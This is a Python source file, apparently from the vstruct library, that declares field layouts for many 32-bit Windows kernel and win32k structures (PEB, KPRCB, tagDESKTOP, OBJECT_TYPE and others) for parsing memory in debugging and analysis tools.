class DMM_MONITORDESCRIPTOR_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Id = v_uint32()
self.Type = v_uint32()
self.Origin = v_uint32()
self.Data = vstruct.VArray([ v_uint8() for i in xrange(128) ])
class DESCRIPTOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Pad = v_uint16()
self.Limit = v_uint16()
self.Base = v_uint32()
class PROCDESKHEAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.h = v_ptr32()
self.cLockObj = v_uint32()
self.hTaskWow = v_uint32()
self.rpdesk = v_ptr32()
self.pSelf = v_ptr32()
class SM_VALUES_STRINGS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pszName = v_ptr32()
self.ulValue = v_uint32()
self.RangeType = v_uint32()
self.StorageType = v_uint32()
class HBRUSH(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class SECURITY_QUALITY_OF_SERVICE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.ImpersonationLevel = v_uint32()
self.ContextTrackingMode = v_uint8()
self.EffectiveOnly = v_uint8()
self._pad000c = v_bytes(size=2)
class _unnamed_12471(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Create = _unnamed_12558()
class WHEA_ERROR_RECORD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Header = WHEA_ERROR_RECORD_HEADER()
self.SectionDescriptor = vstruct.VArray([ WHEA_ERROR_RECORD_SECTION_DESCRIPTOR() for i in xrange(1) ])
class LUID(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LowPart = v_uint32()
self.HighPart = v_uint32()
class tagDESKTOP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwSessionId = v_uint32()
self.pDeskInfo = v_ptr32()
self.pDispInfo = v_ptr32()
self.rpdeskNext = v_ptr32()
self.rpwinstaParent = v_ptr32()
self.dwDTFlags = v_uint32()
self.dwDesktopId = v_uint32()
self.spmenuSys = v_ptr32()
self.spmenuDialogSys = v_ptr32()
self.spmenuHScroll = v_ptr32()
self.spmenuVScroll = v_ptr32()
self.spwndForeground = v_ptr32()
self.spwndTray = v_ptr32()
self.spwndMessage = v_ptr32()
self.spwndTooltip = v_ptr32()
self.hsectionDesktop = v_ptr32()
self.pheapDesktop = v_ptr32()
self.ulHeapSize = v_uint32()
self.cciConsole = CONSOLE_CARET_INFO()
self.PtiList = LIST_ENTRY()
self.spwndTrack = v_ptr32()
self.htEx = v_uint32()
self.rcMouseHover = tagRECT()
self.dwMouseHoverTime = v_uint32()
self.pMagInputTransform = v_ptr32()
class tagPOOLRECORD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ExtraData = v_ptr32()
self.size = v_uint32()
self.trace = vstruct.VArray([ v_ptr32() for i in xrange(6) ])
class CLIENT_ID(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.UniqueProcess = v_ptr32()
self.UniqueThread = v_ptr32()
class OBJECT_DUMP_CONTROL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Stream = v_ptr32()
self.Detail = v_uint32()
class _unnamed_15793(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Generic = _unnamed_16064()
class _unnamed_16610(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length40 = v_uint32()
self.Alignment40 = v_uint32()
self.MinimumAddress = LARGE_INTEGER()
self.MaximumAddress = LARGE_INTEGER()
class _unnamed_16615(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length48 = v_uint32()
self.Alignment48 = v_uint32()
self.MinimumAddress = LARGE_INTEGER()
self.MaximumAddress = LARGE_INTEGER()
class tagSPB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pspbNext = v_ptr32()
self.spwnd = v_ptr32()
self.hbm = v_ptr32()
self.rc = tagRECT()
self.hrgn = v_ptr32()
self.flags = v_uint32()
self.ulSaveId = v_uint32()
class DMM_VIDPNSET_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NumVidPns = v_uint8()
self._pad0004 = v_bytes(size=3)
self.VidPnOffset = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class STRING(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint16()
self.MaximumLength = v_uint16()
self.Buffer = v_ptr32()
class TP_POOL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class tagPROP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.hData = v_ptr32()
self.atomKey = v_uint16()
self.fs = v_uint16()
class _unnamed_12822(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DeviceTextType = v_uint32()
self.LocaleId = v_uint32()
class LIST_ENTRY32(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flink = v_uint32()
self.Blink = v_uint32()
class SINGLE_LIST_ENTRY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Next = v_ptr32()
class KDEVICE_QUEUE_ENTRY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DeviceListEntry = LIST_ENTRY()
self.SortKey = v_uint32()
self.Inserted = v_uint8()
self._pad0010 = v_bytes(size=3)
class D3DKMDT_VIDPN_SOURCE_MODE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Id = v_uint32()
self.Type = v_uint32()
self.Format = _unnamed_13381()
class _unnamed_12574(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SecurityContext = v_ptr32()
self.Options = v_uint32()
self.Reserved = v_uint16()
self.ShareAccess = v_uint16()
self.Parameters = v_ptr32()
class tagCLIENTTHREADINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.CTIF_flags = v_uint32()
self.fsChangeBits = v_uint16()
self.fsWakeBits = v_uint16()
self.fsWakeBitsJournal = v_uint16()
self.fsWakeMask = v_uint16()
self.tickLastMsgChecked = v_uint32()
class tagKbdNlsLayer(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.OEMIdentifier = v_uint16()
self.LayoutInformation = v_uint16()
self.NumOfVkToF = v_uint32()
self.pVkToF = v_ptr32()
self.NumOfMouseVKey = v_uint32()
self.pusMouseVKey = v_ptr32()
class _unnamed_12654(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.FileName = v_ptr32()
self.FileInformationClass = v_uint32()
self.FileIndex = v_uint32()
class KSPIN_LOCK_QUEUE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Next = v_ptr32()
self.Lock = v_ptr32()
class tagPROCESS_HID_TABLE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.link = LIST_ENTRY()
self.InclusionList = LIST_ENTRY()
self.UsagePageList = LIST_ENTRY()
self.ExclusionList = LIST_ENTRY()
self.spwndTargetMouse = v_ptr32()
self.spwndTargetKbd = v_ptr32()
self.nSinks = v_uint32()
self.pLastRequest = v_ptr32()
self.UsagePageLast = v_uint16()
self.UsageLast = v_uint16()
self.fRawMouse = v_uint32()
class WHEA_ERROR_PACKET_FLAGS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PreviousError = v_uint32()
class IO_RESOURCE_DESCRIPTOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Option = v_uint8()
self.Type = v_uint8()
self.ShareDisposition = v_uint8()
self.Spare1 = v_uint8()
self.Flags = v_uint16()
self.Spare2 = v_uint16()
self.u = _unnamed_16049()
class EX_PUSH_LOCK_CACHE_AWARE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Locks = vstruct.VArray([ v_ptr32() for i in xrange(1) ])
class tagMLIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pqmsgRead = v_ptr32()
self.pqmsgWriteLast = v_ptr32()
self.cMsgs = v_uint32()
class DMM_MONITORDESCRIPTORSET_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NumDescriptors = v_uint8()
self._pad0004 = v_bytes(size=3)
self.DescriptorSerialization = vstruct.VArray([ DMM_MONITORDESCRIPTOR_SERIALIZATION() for i in xrange(1) ])
class tagCLIP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.fmt = v_uint32()
self.hData = v_ptr32()
self.fGlobalHandle = v_uint32()
class tagSMS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.psmsNext = v_ptr32()
self.psmsReceiveNext = v_ptr32()
self.ptiSender = v_ptr32()
self.ptiReceiver = v_ptr32()
self.lpResultCallBack = v_ptr32()
self.dwData = v_uint32()
self.ptiCallBackSender = v_ptr32()
self.lRet = v_uint32()
self.tSent = v_uint32()
self.flags = v_uint32()
self.wParam = v_uint32()
self.lParam = v_uint32()
self.message = v_uint32()
self.spwnd = v_ptr32()
self.pvCapture = v_ptr32()
class IMAGE_OPTIONAL_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Magic = v_uint16()
self.MajorLinkerVersion = v_uint8()
self.MinorLinkerVersion = v_uint8()
self.SizeOfCode = v_uint32()
self.SizeOfInitializedData = v_uint32()
self.SizeOfUninitializedData = v_uint32()
self.AddressOfEntryPoint = v_uint32()
self.BaseOfCode = v_uint32()
self.BaseOfData = v_uint32()
self.ImageBase = v_uint32()
self.SectionAlignment = v_uint32()
self.FileAlignment = v_uint32()
self.MajorOperatingSystemVersion = v_uint16()
self.MinorOperatingSystemVersion = v_uint16()
self.MajorImageVersion = v_uint16()
self.MinorImageVersion = v_uint16()
self.MajorSubsystemVersion = v_uint16()
self.MinorSubsystemVersion = v_uint16()
self.Win32VersionValue = v_uint32()
self.SizeOfImage = v_uint32()
self.SizeOfHeaders = v_uint32()
self.CheckSum = v_uint32()
self.Subsystem = v_uint16()
self.DllCharacteristics = v_uint16()
self.SizeOfStackReserve = v_uint32()
self.SizeOfStackCommit = v_uint32()
self.SizeOfHeapReserve = v_uint32()
self.SizeOfHeapCommit = v_uint32()
self.LoaderFlags = v_uint32()
self.NumberOfRvaAndSizes = v_uint32()
self.DataDirectory = vstruct.VArray([ IMAGE_DATA_DIRECTORY() for i in xrange(16) ])
class _unnamed_12786(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Capabilities = v_ptr32()
class ETHREAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class FAST_MUTEX(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Count = v_uint32()
self.Owner = v_ptr32()
self.Contention = v_uint32()
self.Event = KEVENT()
self.OldIrql = v_uint32()
class WHEA_ERROR_RECORD_HEADER_VALIDBITS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PlatformId = v_uint32()
class D3DKMDT_VIDPN_PRESENT_PATH_TRANSFORMATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Scaling = v_uint32()
self.ScalingSupport = D3DKMDT_VIDPN_PRESENT_PATH_SCALING_SUPPORT()
self.Rotation = v_uint32()
self.RotationSupport = D3DKMDT_VIDPN_PRESENT_PATH_ROTATION_SUPPORT()
class KDEVICE_QUEUE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint16()
self.Size = v_uint16()
self.DeviceListHead = LIST_ENTRY()
self.Lock = v_uint32()
self.Busy = v_uint8()
self._pad0014 = v_bytes(size=3)
class CALLBACKWND(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.hwnd = v_ptr32()
self.pwnd = v_ptr32()
self.pActCtx = v_ptr32()
class _unnamed_12395(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Overlay = _unnamed_12510()
self._pad0030 = v_bytes(size=8)
class IO_SECURITY_CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SecurityQos = v_ptr32()
self.AccessState = v_ptr32()
self.DesiredAccess = v_uint32()
self.FullCreateOptions = v_uint32()
class tagSIZE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cx = v_uint32()
self.cy = v_uint32()
class tagDESKTOPVIEW(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pdvNext = v_ptr32()
self.pdesk = v_ptr32()
self.ulClientDelta = v_uint32()
class _unnamed_12392(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.AsynchronousParameters = _unnamed_12410()
class PROCMARKHEAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.h = v_ptr32()
self.cLockObj = v_uint32()
self.hTaskWow = v_uint32()
self.ppi = v_ptr32()
class INITIAL_PRIVILEGE_SET(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PrivilegeCount = v_uint32()
self.Control = v_uint32()
self.Privilege = vstruct.VArray([ LUID_AND_ATTRIBUTES() for i in xrange(3) ])
class D3DKMDT_COLOR_COEFF_DYNAMIC_RANGES(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.FirstChannel = v_uint32()
self.SecondChannel = v_uint32()
self.ThirdChannel = v_uint32()
self.FourthChannel = v_uint32()
class WHEA_ERROR_RECORD_HEADER_FLAGS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Recovered = v_uint32()
class _unnamed_15582(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Attrib = v_uint32()
self.cbData = v_uint32()
class _unnamed_15585(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Attrib = v_uint32()
self.cbData = v_uint32()
class D3DKMDT_FREQUENCY_RANGE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MinVSyncFreq = D3DDDI_RATIONAL()
self.MaxVSyncFreq = D3DDDI_RATIONAL()
self.MinHSyncFreq = D3DDDI_RATIONAL()
self.MaxHSyncFreq = D3DDDI_RATIONAL()
class PFNCLIENT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pfnScrollBarWndProc = v_ptr32()
self.pfnTitleWndProc = v_ptr32()
self.pfnMenuWndProc = v_ptr32()
self.pfnDesktopWndProc = v_ptr32()
self.pfnDefWindowProc = v_ptr32()
self.pfnMessageWindowProc = v_ptr32()
self.pfnSwitchWindowProc = v_ptr32()
self.pfnButtonWndProc = v_ptr32()
self.pfnComboBoxWndProc = v_ptr32()
self.pfnComboListBoxProc = v_ptr32()
self.pfnDialogWndProc = v_ptr32()
self.pfnEditWndProc = v_ptr32()
self.pfnListBoxWndProc = v_ptr32()
self.pfnMDIClientWndProc = v_ptr32()
self.pfnStaticWndProc = v_ptr32()
self.pfnImeWndProc = v_ptr32()
self.pfnGhostWndProc = v_ptr32()
self.pfnHkINLPCWPSTRUCT = v_ptr32()
self.pfnHkINLPCWPRETSTRUCT = v_ptr32()
self.pfnDispatchHook = v_ptr32()
self.pfnDispatchDefWindowProc = v_ptr32()
self.pfnDispatchMessage = v_ptr32()
self.pfnMDIActivateDlgProc = v_ptr32()
class ACTIVATION_CONTEXT_DATA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class FILE_NETWORK_OPEN_INFORMATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.CreationTime = LARGE_INTEGER()
self.LastAccessTime = LARGE_INTEGER()
self.LastWriteTime = LARGE_INTEGER()
self.ChangeTime = LARGE_INTEGER()
self.AllocationSize = LARGE_INTEGER()
self.EndOfFile = LARGE_INTEGER()
self.FileAttributes = v_uint32()
self._pad0038 = v_bytes(size=4)
class TEB_ACTIVE_FRAME(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flags = v_uint32()
self.Previous = v_ptr32()
self.Context = v_ptr32()
class tagSVR_INSTANCE_INFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = THROBJHEAD()
self.next = v_ptr32()
self.nextInThisThread = v_ptr32()
self.afCmd = v_uint32()
self.spwndEvent = v_ptr32()
self.pcii = v_ptr32()
class RTL_DRIVE_LETTER_CURDIR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flags = v_uint16()
self.Length = v_uint16()
self.TimeStamp = v_uint32()
self.DosPath = STRING()
class GENERAL_LOOKASIDE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ListHead = SLIST_HEADER()
self.Depth = v_uint16()
self.MaximumDepth = v_uint16()
self.TotalAllocates = v_uint32()
self.AllocateMisses = v_uint32()
self.TotalFrees = v_uint32()
self.FreeMisses = v_uint32()
self.Type = v_uint32()
self.Tag = v_uint32()
self.Size = v_uint32()
self.AllocateEx = v_ptr32()
self.FreeEx = v_ptr32()
self.ListEntry = LIST_ENTRY()
self.LastTotalAllocates = v_uint32()
self.LastAllocateMisses = v_uint32()
self.Future = vstruct.VArray([ v_uint32() for i in xrange(2) ])
class VWPL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cPwnd = v_uint32()
self.cElem = v_uint32()
self.cThreshhold = v_uint32()
self.fTagged = v_uint32()
self.aElement = vstruct.VArray([ VWPLELEMENT() for i in xrange(0) ])
class KPRCB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MinorVersion = v_uint16()
self.MajorVersion = v_uint16()
self.CurrentThread = v_ptr32()
self.NextThread = v_ptr32()
self.IdleThread = v_ptr32()
self.LegacyNumber = v_uint8()
self.NestingLevel = v_uint8()
self.BuildType = v_uint16()
self.CpuType = v_uint8()
self.CpuID = v_uint8()
self.CpuStep = v_uint16()
self.ProcessorState = KPROCESSOR_STATE()
self.KernelReserved = vstruct.VArray([ v_uint32() for i in xrange(16) ])
self.HalReserved = vstruct.VArray([ v_uint32() for i in xrange(16) ])
self.CFlushSize = v_uint32()
self.CoresPerPhysicalProcessor = v_uint8()
self.LogicalProcessorsPerCore = v_uint8()
self.PrcbPad0 = vstruct.VArray([ v_uint8() for i in xrange(2) ])
self.MHz = v_uint32()
self.CpuVendor = v_uint8()
self.GroupIndex = v_uint8()
self.Group = v_uint16()
self.GroupSetMember = v_uint32()
self.Number = v_uint32()
self.PrcbPad1 = vstruct.VArray([ v_uint8() for i in xrange(72) ])
self.LockQueue = vstruct.VArray([ KSPIN_LOCK_QUEUE() for i in xrange(17) ])
class ULARGE_INTEGER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LowPart = v_uint32()
self.HighPart = v_uint32()
class tagCURSOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = PROCMARKHEAD()
self.pcurNext = v_ptr32()
self.strName = UNICODE_STRING()
self.atomModName = v_uint16()
self.rt = v_uint16()
self.CURSORF_flags = v_uint32()
self.xHotspot = v_uint16()
self.yHotspot = v_uint16()
self.hbmMask = v_ptr32()
self.hbmColor = v_ptr32()
self.hbmAlpha = v_ptr32()
self.rcBounds = tagRECT()
self.hbmUserAlpha = v_ptr32()
self.bpp = v_uint32()
self.cx = v_uint32()
self.cy = v_uint32()
class tagDCE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pdceNext = v_ptr32()
self.hdc = v_ptr32()
self.pwndOrg = v_ptr32()
self.pwndClip = v_ptr32()
self.pwndRedirect = v_ptr32()
self.hrgnClip = v_ptr32()
self.hrgnClipPublic = v_ptr32()
self.hrgnSavedVis = v_ptr32()
self.DCX_flags = v_uint32()
self.ptiOwner = v_ptr32()
self.ppiOwner = v_ptr32()
self.pMonitor = v_ptr32()
class tagPROCESS_HID_REQUEST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.link = LIST_ENTRY()
self.usUsagePage = v_uint16()
self.usUsage = v_uint16()
self.fSinkable = v_uint32()
self.pTLCInfo = v_ptr32()
self.spwndTarget = v_ptr32()
class NAMED_PIPE_CREATE_PARAMETERS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NamedPipeType = v_uint32()
self.ReadMode = v_uint32()
self.CompletionMode = v_uint32()
self.MaximumInstances = v_uint32()
self.InboundQuota = v_uint32()
self.OutboundQuota = v_uint32()
self.DefaultTimeout = LARGE_INTEGER()
self.TimeoutSpecified = v_uint8()
self._pad0028 = v_bytes(size=7)
class NT_TIB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ExceptionList = v_ptr32()
self.StackBase = v_ptr32()
self.StackLimit = v_ptr32()
self.SubSystemTib = v_ptr32()
self.FiberData = v_ptr32()
self.ArbitraryUserPointer = v_ptr32()
self.Self = v_ptr32()
class POWER_STATE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SystemState = v_uint32()
class UNICODE_STRING(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint16()
self.MaximumLength = v_uint16()
self.Buffer = v_ptr32()
class DMM_MONITORSOURCEMODESET_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NumModes = v_uint8()
self._pad0004 = v_bytes(size=3)
self.ModeSerialization = vstruct.VArray([ DMM_MONITOR_SOURCE_MODE_SERIALIZATION() for i in xrange(1) ])
class D3DKMDT_VIDPN_TARGET_MODE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Id = v_uint32()
self.VideoSignalInfo = D3DKMDT_VIDEO_SIGNAL_INFO()
self.Preference = v_uint32()
class COMPRESSED_DATA_INFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.CompressionFormatAndEngine = v_uint16()
self.CompressionUnitShift = v_uint8()
self.ChunkShift = v_uint8()
self.ClusterShift = v_uint8()
self.Reserved = v_uint8()
self.NumberOfChunks = v_uint16()
self.CompressedChunkSizes = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class tagWOWTHREADINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pwtiNext = v_ptr32()
self.idTask = v_uint32()
self.idWaitObject = v_uint32()
self.idParentProcess = v_uint32()
self.pIdleEvent = v_ptr32()
class _unnamed_12593(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.Key = v_uint32()
self.ByteOffset = LARGE_INTEGER()
class PEB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.InheritedAddressSpace = v_uint8()
self.ReadImageFileExecOptions = v_uint8()
self.BeingDebugged = v_uint8()
self.BitField = v_uint8()
self.Mutant = v_ptr32()
self.ImageBaseAddress = v_ptr32()
self.Ldr = v_ptr32()
self.ProcessParameters = v_ptr32()
self.SubSystemData = v_ptr32()
self.ProcessHeap = v_ptr32()
self.FastPebLock = v_ptr32()
self.AtlThunkSListPtr = v_ptr32()
self.IFEOKey = v_ptr32()
self.CrossProcessFlags = v_uint32()
self.KernelCallbackTable = v_ptr32()
self.SystemReserved = vstruct.VArray([ v_uint32() for i in xrange(1) ])
self.AtlThunkSListPtr32 = v_uint32()
self.ApiSetMap = v_ptr32()
self.TlsExpansionCounter = v_uint32()
self.TlsBitmap = v_ptr32()
self.TlsBitmapBits = vstruct.VArray([ v_uint32() for i in xrange(2) ])
self.ReadOnlySharedMemoryBase = v_ptr32()
self.HotpatchInformation = v_ptr32()
self.ReadOnlyStaticServerData = v_ptr32()
self.AnsiCodePageData = v_ptr32()
self.OemCodePageData = v_ptr32()
self.UnicodeCaseTableData = v_ptr32()
self.NumberOfProcessors = v_uint32()
self.NtGlobalFlag = v_uint32()
self._pad0070 = v_bytes(size=4)
self.CriticalSectionTimeout = LARGE_INTEGER()
self.HeapSegmentReserve = v_uint32()
self.HeapSegmentCommit = v_uint32()
self.HeapDeCommitTotalFreeThreshold = v_uint32()
self.HeapDeCommitFreeBlockThreshold = v_uint32()
self.NumberOfHeaps = v_uint32()
self.MaximumNumberOfHeaps = v_uint32()
self.ProcessHeaps = v_ptr32()
self.GdiSharedHandleTable = v_ptr32()
self.ProcessStarterHelper = v_ptr32()
self.GdiDCAttributeList = v_uint32()
self.LoaderLock = v_ptr32()
self.OSMajorVersion = v_uint32()
self.OSMinorVersion = v_uint32()
self.OSBuildNumber = v_uint16()
self.OSCSDVersion = v_uint16()
self.OSPlatformId = v_uint32()
self.ImageSubsystem = v_uint32()
self.ImageSubsystemMajorVersion = v_uint32()
self.ImageSubsystemMinorVersion = v_uint32()
self.ActiveProcessAffinityMask = v_uint32()
self.GdiHandleBuffer = vstruct.VArray([ v_uint32() for i in xrange(34) ])
self.PostProcessInitRoutine = v_ptr32()
self.TlsExpansionBitmap = v_ptr32()
self.TlsExpansionBitmapBits = vstruct.VArray([ v_uint32() for i in xrange(32) ])
self.SessionId = v_uint32()
self.AppCompatFlags = ULARGE_INTEGER()
self.AppCompatFlagsUser = ULARGE_INTEGER()
self.pShimData = v_ptr32()
self.AppCompatInfo = v_ptr32()
self.CSDVersion = UNICODE_STRING()
self.ActivationContextData = v_ptr32()
self.ProcessAssemblyStorageMap = v_ptr32()
self.SystemDefaultActivationContextData = v_ptr32()
self.SystemAssemblyStorageMap = v_ptr32()
self.MinimumStackCommit = v_uint32()
self.FlsCallback = v_ptr32()
self.FlsListHead = LIST_ENTRY()
self.FlsBitmap = v_ptr32()
self.FlsBitmapBits = vstruct.VArray([ v_uint32() for i in xrange(4) ])
self.FlsHighIndex = v_uint32()
self.WerRegistrationData = v_ptr32()
self.WerShipAssertPtr = v_ptr32()
self.pContextData = v_ptr32()
self.pImageHeaderHash = v_ptr32()
self.TracingFlags = v_uint32()
self._pad0248 = v_bytes(size=4)
class _unnamed_12817(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.IdType = v_uint32()
class W32THREAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pEThread = v_ptr32()
self.RefCount = v_uint32()
self.ptlW32 = v_ptr32()
self.pgdiDcattr = v_ptr32()
self.pgdiBrushAttr = v_ptr32()
self.pUMPDObjs = v_ptr32()
self.pUMPDHeap = v_ptr32()
self.pUMPDObj = v_ptr32()
self.GdiTmpTgoList = LIST_ENTRY()
self.pRBRecursionCount = v_uint32()
self.pNonRBRecursionCount = v_uint32()
self.tlSpriteState = TLSPRITESTATE()
self.pSpriteState = v_ptr32()
self.pDevHTInfo = v_ptr32()
self.ulDevHTInfoUniqueness = v_uint32()
self.pdcoAA = v_ptr32()
self.pdcoRender = v_ptr32()
self.pdcoSrc = v_ptr32()
self.bEnableEngUpdateDeviceSurface = v_uint8()
self.bIncludeSprites = v_uint8()
self._pad00ac = v_bytes(size=2)
self.ulWindowSystemRendering = v_uint32()
self.iVisRgnUniqueness = v_uint32()
class KDPC(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint8()
self.Importance = v_uint8()
self.Number = v_uint16()
self.DpcListEntry = LIST_ENTRY()
self.DeferredRoutine = v_ptr32()
self.DeferredContext = v_ptr32()
self.SystemArgument1 = v_ptr32()
self.SystemArgument2 = v_ptr32()
self.DpcData = v_ptr32()
class KEVENT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Header = DISPATCHER_HEADER()
class KSEMAPHORE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Header = DISPATCHER_HEADER()
self.Limit = v_uint32()
class _unnamed_16581(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.Alignment = v_uint32()
self.MinimumAddress = LARGE_INTEGER()
self.MaximumAddress = LARGE_INTEGER()
class OBJECT_TYPE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.TypeList = LIST_ENTRY()
self.Name = UNICODE_STRING()
self.DefaultObject = v_ptr32()
self.Index = v_uint8()
self._pad0018 = v_bytes(size=3)
self.TotalNumberOfObjects = v_uint32()
self.TotalNumberOfHandles = v_uint32()
self.HighWaterNumberOfObjects = v_uint32()
self.HighWaterNumberOfHandles = v_uint32()
self.TypeInfo = OBJECT_TYPE_INITIALIZER()
self.TypeLock = EX_PUSH_LOCK()
self.Key = v_uint32()
self.CallbackList = LIST_ENTRY()
class tagIMEINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwPrivateDataSize = v_uint32()
self.fdwProperty = v_uint32()
self.fdwConversionCaps = v_uint32()
self.fdwSentenceCaps = v_uint32()
self.fdwUICaps = v_uint32()
self.fdwSCSCaps = v_uint32()
self.fdwSelectCaps = v_uint32()
class DXGK_DIAG_CODE_POINT_PACKET(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Header = DXGK_DIAG_HEADER()
self.CodePointType = v_uint32()
self.Param1 = v_uint32()
self.Param2 = v_uint32()
self.Param3 = v_uint32()
class W32PROCESS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Process = v_ptr32()
self.RefCount = v_uint32()
self.W32PF_Flags = v_uint32()
self.InputIdleEvent = v_ptr32()
self.StartCursorHideTime = v_uint32()
self.NextStart = v_ptr32()
self.pDCAttrList = v_ptr32()
self.pBrushAttrList = v_ptr32()
